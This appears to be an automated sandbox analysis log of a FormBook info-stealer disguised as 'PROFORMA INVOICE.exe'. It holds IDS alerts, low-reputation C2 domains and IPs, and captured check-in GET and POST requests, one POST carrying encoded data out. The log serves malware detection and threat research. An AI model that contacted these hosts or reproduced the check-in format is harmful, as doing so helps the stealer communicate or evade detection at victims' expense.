Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49820 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49823 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49804 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49804 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49818 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49831 -> 64.190.63.222:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49809 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49819 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49827 -> 31.31.196.17:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49834 -> 217.76.156.252:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.huiguang.xyz
Source:	DNS query: www.schedulemassage.xyz

Source: Joe Sandbox View	IP Address: 203.161.49.193 203.161.49.193
Source: Joe Sandbox View	IP Address: 31.31.196.17 31.31.196.17

Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View	ASN Name: AS-REGRU AS-REGRU
Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View	ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FB4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00FB4EB5

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 15 Nov 2024 03:22:58 GMTserver: Apacheset-cookie: __tad=1731640978.1427526; expires=Mon, 13-Nov-2034 03:22:58 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 34 99 64 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b d3 a7 38 bf 4c 1c fa 5d 4b e1 fc 1e c2 7e 2c ec 82 ce 60 27 b9 3c 23 b2 bd f6 a1 d8 e7 6a 39 c0 54 8b f2 d1 52 fa ec 6e 7a 3e fd bf 76 85 32 03 21 e8 3e 01 63 55 93 a2 73 43 c7 ff fe 0e 43 57 5f 8e 1c 1d 79 8a 61 65 2b 6e 34 04 ec da d9 9d a9 16 17 d7 b3 6b 35 7f 07 27 60 f4 00 62 da 78 19 06 f4 6a ad 6c 6b 9d 88 2f ea 61 c5 10 26 96 b7 b3 61 f1 bc 16 95 de c3 c0 15 49 a5 3d ab 3f 2e c0 58 83 cb a4 2c 24 34 0e 6b f1 cf f9 0d 93 30 4f ca 8f ad 56 5b 68 d0 e1 30 a8 86 d0 15 b9 e4 8b c3 f9 b9 8a b1 a3 9b a2 43 e2 b4 9c f0 0a 7f ed f4 5e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 6c 09 3f 6e be 8a d7 aa be 0d f7 f2 29 31 3b 0f 96 87 0e 84 bf c2 03 08 12 dd 79 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 15 Nov 2024 03:23:01 GMTserver: Apacheset-cookie: __tad=1731640981.6038068; expires=Mon, 13-Nov-2034 03:23:01 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 34 99 64 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b d3 a7 38 bf 4c 1c fa 5d 4b e1 fc 1e c2 7e 2c ec 82 ce 60 27 b9 3c 23 b2 bd f6 a1 d8 e7 6a 39 c0 54 8b f2 d1 52 fa ec 6e 7a 3e fd bf 76 85 32 03 21 e8 3e 01 63 55 93 a2 73 43 c7 ff fe 0e 43 57 5f 8e 1c 1d 79 8a 61 65 2b 6e 34 04 ec da d9 9d a9 16 17 d7 b3 6b 35 7f 07 27 60 f4 00 62 da 78 19 06 f4 6a ad 6c 6b 9d 88 2f ea 61 c5 10 26 96 b7 b3 61 f1 bc 16 95 de c3 c0 15 49 a5 3d ab 3f 2e c0 58 83 cb a4 2c 24 34 0e 6b f1 cf f9 0d 93 30 4f ca 8f ad 56 5b 68 d0 e1 30 a8 86 d0 15 b9 e4 8b c3 f9 b9 8a b1 a3 9b a2 43 e2 b4 9c f0 0a 7f ed f4 5e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 6c 09 3f 6e be 8a d7 aa be 0d f7 f2 29 31 3b 0f 96 87 0e 84 bf c2 03 08 12 dd 79 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 15 Nov 2024 03:23:04 GMTserver: Apacheset-cookie: __tad=1731640984.4905667; expires=Mon, 13-Nov-2034 03:23:04 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 34 99 64 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b d3 a7 38 bf 4c 1c fa 5d 4b e1 fc 1e c2 7e 2c ec 82 ce 60 27 b9 3c 23 b2 bd f6 a1 d8 e7 6a 39 c0 54 8b f2 d1 52 fa ec 6e 7a 3e fd bf 76 85 32 03 21 e8 3e 01 63 55 93 a2 73 43 c7 ff fe 0e 43 57 5f 8e 1c 1d 79 8a 61 65 2b 6e 34 04 ec da d9 9d a9 16 17 d7 b3 6b 35 7f 07 27 60 f4 00 62 da 78 19 06 f4 6a ad 6c 6b 9d 88 2f ea 61 c5 10 26 96 b7 b3 61 f1 bc 16 95 de c3 c0 15 49 a5 3d ab 3f 2e c0 58 83 cb a4 2c 24 34 0e 6b f1 cf f9 0d 93 30 4f ca 8f ad 56 5b 68 d0 e1 30 a8 86 d0 15 b9 e4 8b c3 f9 b9 8a b1 a3 9b a2 43 e2 b4 9c f0 0a 7f ed f4 5e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 6c 09 3f 6e be 8a d7 aa be 0d f7 f2 29 31 3b 0f 96 87 0e 84 bf c2 03 08 12 dd 79 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y

Source: global traffic	HTTP traffic detected: GET /hv6g/?A69pk=_b0Tr07p9f0pn&R4qXin=vSitAQgQO9xnWjtO9fvjetkh7TKEKyOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP+O9AD54eipMHpO96aeC1LnvmikAK9niWdM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.huiguang.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /79tr/?R4qXin=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&A69pk=_b0Tr07p9f0pn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /hxmz/?A69pk=_b0Tr07p9f0pn&R4qXin=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.futurevision.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /slxp/?R4qXin=QrWs1MGbYyQFoq3udSaW2R0wE8dP0+vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs/0Bo4314wmW6buSFT8Qs1kQOmXTHHnWTO0=&A69pk=_b0Tr07p9f0pn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.schedulemassage.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /0598/?R4qXin=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&A69pk=_b0Tr07p9f0pn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mcfunding.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /y3dc/?R4qXin=ihLGZn7rk3oJmiIz33Bz1E4xhZDY72dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERgPwyb4b9y8rXeUu2h/5aaRRGXSXrvcfb4U=&A69pk=_b0Tr07p9f0pn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.migorengya8.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /3m3e/?R4qXin=AG8wkc12D4O4qfEwAs2juVKQc9rSxhRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNdpOWkpvpmQUiiaCEh/01bYK5u1RRn/kwMI=&A69pk=_b0Tr07p9f0pn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.klohk.techConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /rqnz/?R4qXin=76huNjt+Arc+fPcFGkrGedsPXjdBvzRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5tbMSaPOALNuAB6ZkqasdgIxv5yPN3CQ/0Z4=&A69pk=_b0Tr07p9f0pn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.d63dm.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /h26k/?R4qXin=3BjO5l4trS+mOtJJJG3yLOLYEPQxRCXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcJ7681zBJff7eDJ/XOLmbyjnrIh14rmHejEU=&A69pk=_b0Tr07p9f0pn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.servannto.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ykhz/?R4qXin=enw3MzdkIinzyconrt+LdXpbKzGUXGhn7Q0Xf9Uq8WeILZ9WFoLyJZQsqpUbcYSzxWL6OSWVl3hVVR/aqS9N0B516/fKEgz8/g/xdDd1Xa0zA7mU5eGkJFY=&A69pk=_b0Tr07p9f0pn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.telforce.oneConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.huiguang.xyz
Source: global traffic	DNS traffic detected: DNS query: www.beingandbecoming.ltd
Source: global traffic	DNS traffic detected: DNS query: www.futurevision.life
Source: global traffic	DNS traffic detected: DNS query: www.schedulemassage.xyz
Source: global traffic	DNS traffic detected: DNS query: www.mcfunding.org
Source: global traffic	DNS traffic detected: DNS query: www.migorengya8.click
Source: global traffic	DNS traffic detected: DNS query: www.klohk.tech
Source: global traffic	DNS traffic detected: DNS query: www.d63dm.top
Source: global traffic	DNS traffic detected: DNS query: www.servannto.site
Source: global traffic	DNS traffic detected: DNS query: www.telforce.one
Source: global traffic	DNS traffic detected: DNS query: www.cesach.net

Source: unknown

HTTP traffic detected: POST /79tr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 203Cache-Control: no-cacheOrigin: http://www.beingandbecoming.ltdReferer: http://www.beingandbecoming.ltd/79tr/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36Data Raw: 52 34 71 58 69 6e 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 71 47 4b 5a 4b 53 74 6b 71 6a 68 36 52 4e 4b 2f 4f 62 79 5a 37 64 33 69 65 6d 4f 63 55 73 6e 6b 77 3d 3d Data Ascii: R4qXin=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgWqGKZKStkqjh6RNK/ObyZ7d3iemOcUsnkw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 03:22:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 03:22:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
